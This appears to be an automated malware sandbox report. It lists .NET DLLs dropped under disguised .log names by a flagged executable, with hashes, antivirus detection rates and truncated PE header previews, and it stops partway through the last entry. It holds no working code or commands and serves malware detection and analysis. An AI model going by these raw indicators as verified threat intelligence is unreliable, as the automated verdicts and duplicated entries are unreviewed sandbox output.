                                                                                                                                                                  C:\Users\user\Desktop\FpakjsdS.log

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Users\user\Desktop\zZ1Y43bxxV.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):22016
                                                                                                                                                                  Entropy (8bit):5.41854385721431
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:384:8Np+VQupukpNURNzOLn7TcZ64vTUbqryealcpA2:bPpu0NyzOL0ZJ4bavae
                                                                                                                                                                  MD5:BBDE7073BAAC996447F749992D65FFBA
                                                                                                                                                                  SHA1:2DA17B715689186ABEE25419A59C280800F7EDDE
                                                                                                                                                                  SHA-256:1FAE639DF1C497A54C9F42A8366EDAE3C0A6FEB4EB917ECAD9323EF8D87393E8
                                                                                                                                                                  SHA-512:0EBDDE3A13E3D27E4FFDAF162382D463D8F7E7492B7F5C52D3050ECA3E6BD7A58353E8EC49524A9601CDF8AAC18531F77C2CC6F50097D47BE55DB17A387621DF
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 9%
                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...)..d...........!.....N...........l... ........@.. ..............................R.....@..................................l..O.................................................................................... ............... ..H............text....M... ...N.................. ..`.rsrc................P..............@..@.reloc...............T..............@..B.................l......H........L..............lL..H....................................................................................................................................................................lsx)T.,.....h.)................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\Desktop\GmBsEsrN.log

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Users\user\Desktop\zZ1Y43bxxV.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):342528
                                                                                                                                                                  Entropy (8bit):6.170134230759619
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
                                                                                                                                                                  MD5:9DADB5C8A6FD5020275C31EE6BC61D63
                                                                                                                                                                  SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
                                                                                                                                                                  SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                                                                                                                                                                  SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 50%
                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l..d.........." .....2...........P... ...`....@.. ...................................@.................................LP..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............8..............@..B.................P......H............p..................................................................................................................................................................................GJ2....mj..R...................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\Desktop\HQmkzWIi.log

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):32768
                                                                                                                                                                  Entropy (8bit):5.645950918301459
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
                                                                                                                                                                  MD5:E84DCD8370FAC91DE71DEF8DCF09BFEC
                                                                                                                                                                  SHA1:2E73453750A36FD3611D5007BBB26A39DDF5F190
                                                                                                                                                                  SHA-256:DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
                                                                                                                                                                  SHA-512:77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 29%
                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../6.d...........!.....x............... ........@.. ..............................<.....@....................................W.................................................................................... ............... ..H............text...4v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B........................H........e..L0...........c......................................................................................................................................................................o.<.....r%.2.D..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\Desktop\IaGAqGnL.log

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Users\user\Desktop\zZ1Y43bxxV.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):50176
                                                                                                                                                                  Entropy (8bit):5.723168999026349
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
                                                                                                                                                                  MD5:2E116FC64103D0F0CF47890FD571561E
                                                                                                                                                                  SHA1:3EF08A9B057D1876C24FC76E937CDA461FAC6071
                                                                                                                                                                  SHA-256:25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
                                                                                                                                                                  SHA-512:39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 17%
                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................... .......e....@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............M...................................................................................................................................................................................Xg;.6.'.1. b9g................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\Desktop\JKpAqWmX.log

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):24576
                                                                                                                                                                  Entropy (8bit):5.535426842040921
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:384:aShD1nf4AeGAJVdBb9h2d7WNrFBo29TZHD1qPPPPPDPC2C6/Xa3c4J9UbWr4e169:aSPUrJVH94sDBLVZHxqPPPPPDPC2C6/X
                                                                                                                                                                  MD5:5420053AF2D273C456FB46C2CDD68F64
                                                                                                                                                                  SHA1:EA1808D7A8C401A68097353BB51A85F1225B429C
                                                                                                                                                                  SHA-256:A4DFD8B1735598699A410538B8B2ACE6C9A68631D2A26FBF8089D6537DBB30F2
                                                                                                                                                                  SHA-512:DD4C7625A1E8222286CE8DD3FC94B7C0A053B1AD3BF28D848C65E846D04A721EA4BFFAFA234A4A96AB218CEE3FC1F5788E996C6A6DD56E5A9AB41158131DFD4B
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 17%
                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...a..e...........!.....X...........w... ........@.. ....................................@..................................v..W.................................................................................... ............... ..H............text...$W... ...X.................. ..`.rsrc................Z..............@..@.reloc...............^..............@..B.................w......H........Q..D%...........P........................................................................................................................................................................pw.&..l%\....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\Desktop\LGcbGTIb.log

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):40448
                                                                                                                                                                  Entropy (8bit):5.7028690200758465
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
                                                                                                                                                                  MD5:51B1964F31C557AE8C2B01EA164ABD9F
                                                                                                                                                                  SHA1:97C6E8FD1F21D644281FAF82D017969FE22423E4
                                                                                                                                                                  SHA-256:AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
                                                                                                                                                                  SHA-512:5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 12%
                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."..d...........!................n.... ........@.. ....................................@.....................................S.................................................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........k..@I...........k...........................................................................................................................................................................B._.@.;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\Desktop\NAfrxSmR.log

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):39936
                                                                                                                                                                  Entropy (8bit):5.629584586954759
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
                                                                                                                                                                  MD5:D478E398EFCD2BD9BDBFEA958F7BEE4F
                                                                                                                                                                  SHA1:24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
                                                                                                                                                                  SHA-256:32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
                                                                                                                                                                  SHA-512:0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 17%
                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!................>.... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H........r..h?..........Lq..8....................................................................................................................................................................M..d..u7 ...jj.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\Desktop\NkpshHmC.log

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Users\user\Desktop\zZ1Y43bxxV.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):39936
                                                                                                                                                                  Entropy (8bit):5.629584586954759
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
                                                                                                                                                                  MD5:D478E398EFCD2BD9BDBFEA958F7BEE4F
                                                                                                                                                                  SHA1:24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
                                                                                                                                                                  SHA-256:32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
                                                                                                                                                                  SHA-512:0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 17%
                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!................>.... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H........r..h?..........Lq..8....................................................................................................................................................................M..d..u7 ...jj.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\Desktop\QMyIEiey.log

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Users\user\Desktop\zZ1Y43bxxV.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):38400
                                                                                                                                                                  Entropy (8bit):5.699005826018714
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
                                                                                                                                                                  MD5:87765D141228784AE91334BAE25AD743
                                                                                                                                                                  SHA1:442BA48B1B5BB158E2E6145B0592F81D20CB9C57
                                                                                                                                                                  SHA-256:9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
                                                                                                                                                                  SHA-512:77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 25%
                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...c..d...........!..................... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......Dm...?..........<l......................................................................................................................................................................Q[..u.......;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\Desktop\QVVIoUxv.log

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Users\user\Desktop\zZ1Y43bxxV.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):39936
                                                                                                                                                                  Entropy (8bit):5.660491370279985
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
                                                                                                                                                                  MD5:240E98D38E0B679F055470167D247022
                                                                                                                                                                  SHA1:49888CCED719AE78EE3BAE2959402749668AA1C6
                                                                                                                                                                  SHA-256:C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
                                                                                                                                                                  SHA-512:93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n..d...........!.................... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........q...@.......... q...........................................................................................................................................................................-|{.3.g...p................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\Desktop\RrWiEPnK.log

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):39936
                                                                                                                                                                  Entropy (8bit):5.660491370279985
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
                                                                                                                                                                  MD5:240E98D38E0B679F055470167D247022
                                                                                                                                                                  SHA1:49888CCED719AE78EE3BAE2959402749668AA1C6
                                                                                                                                                                  SHA-256:C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
                                                                                                                                                                  SHA-512:93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n..d...........!.................... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........q...@.......... q...........................................................................................................................................................................-|{.3.g...p................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\Desktop\TxdZLwor.log

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Users\user\Desktop\zZ1Y43bxxV.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):40448
                                                                                                                                                                  Entropy (8bit):5.7028690200758465
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
                                                                                                                                                                  MD5:51B1964F31C557AE8C2B01EA164ABD9F
                                                                                                                                                                  SHA1:97C6E8FD1F21D644281FAF82D017969FE22423E4
                                                                                                                                                                  SHA-256:AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
                                                                                                                                                                  SHA-512:5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 12%
                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."..d...........!................n.... ........@.. ....................................@.....................................S.................................................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........k..@I...........k...........................................................................................................................................................................B._.@.;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\Desktop\UhMZMMnD.log

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):36352
                                                                                                                                                                  Entropy (8bit):5.668291349855899
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
                                                                                                                                                                  MD5:94DA5073CCC14DCF4766DF6781485937
                                                                                                                                                                  SHA1:57300CA6033974810B71CF1AB4F047A026924A7A
                                                                                                                                                                  SHA-256:B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
                                                                                                                                                                  SHA-512:7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 21%
                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@....................................W.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......pi..T;...........g..x........................................................................................................................................................................XWJ..%.v0................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\Desktop\VDeRaRWG.log

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):70144
                                                                                                                                                                  Entropy (8bit):5.909536568846014
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
                                                                                                                                                                  MD5:E4FA63649F1DBD23DE91861BB39C317D
                                                                                                                                                                  SHA1:25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
                                                                                                                                                                  SHA-256:CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
                                                                                                                                                                  SHA-512:C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 29%
                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .................)... ...@....@.. ..............................8.....@..................................(..S....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H..............................................................................................................................................................................................NC>.$qK...X....J................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\Desktop\XriZMeSE.log

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):22016
                                                                                                                                                                  Entropy (8bit):5.41854385721431
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:384:8Np+VQupukpNURNzOLn7TcZ64vTUbqryealcpA2:bPpu0NyzOL0ZJ4bavae
                                                                                                                                                                  MD5:BBDE7073BAAC996447F749992D65FFBA
                                                                                                                                                                  SHA1:2DA17B715689186ABEE25419A59C280800F7EDDE
                                                                                                                                                                  SHA-256:1FAE639DF1C497A54C9F42A8366EDAE3C0A6FEB4EB917ECAD9323EF8D87393E8
                                                                                                                                                                  SHA-512:0EBDDE3A13E3D27E4FFDAF162382D463D8F7E7492B7F5C52D3050ECA3E6BD7A58353E8EC49524A9601CDF8AAC18531F77C2CC6F50097D47BE55DB17A387621DF
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 9%
                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...)..d...........!.....N...........l... ........@.. ..............................R.....@..................................l..O.................................................................................... ............... ..H............text....M... ...N.................. ..`.rsrc................P..............@..@.reloc...............T..............@..B.................l......H........L..............lL..H....................................................................................................................................................................lsx)T.,.....h.)................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\Desktop\YXDPTJnw.log

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):34304
                                                                                                                                                                  Entropy (8bit):5.618776214605176
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
                                                                                                                                                                  MD5:9B25959D6CD6097C0EF36D2496876249
                                                                                                                                                                  SHA1:535B4D0576746D88537D4E9B01353210D893F4D2
                                                                                                                                                                  SHA-256:4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
                                                                                                                                                                  SHA-512:C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 9%
                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....~..........n.... ........@.. ...............................G....@.....................................O.................................................................................... ............... ..H............text...t|... ...~.................. ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........c...8...........b.......................................................................................................................................................................,....:;.....>..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\Desktop\YoKhhehz.log

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):33280
                                                                                                                                                                  Entropy (8bit):5.634433516692816
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
                                                                                                                                                                  MD5:0D323E1CACEA89CAA5DDEAF2F37BCA69
                                                                                                                                                                  SHA1:4769C3E947D02A1FD548BE64013F520D571D96E1
                                                                                                                                                                  SHA-256:873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
                                                                                                                                                                  SHA-512:73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...k..d...........!.....z............... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....y... ...z.................. ..`.rsrc................|..............@..@.reloc..............................@..B........................H.......@`..(9..........._......................................................................................................................................................................V.4...W..e..&&................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\Desktop\aEoYYxCd.log

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Users\user\Desktop\zZ1Y43bxxV.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):34816
                                                                                                                                                                  Entropy (8bit):5.636032516496583
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
                                                                                                                                                                  MD5:996BD447A16F0A20F238A611484AFE86
                                                                                                                                                                  SHA1:CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
                                                                                                                                                                  SHA-256:0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
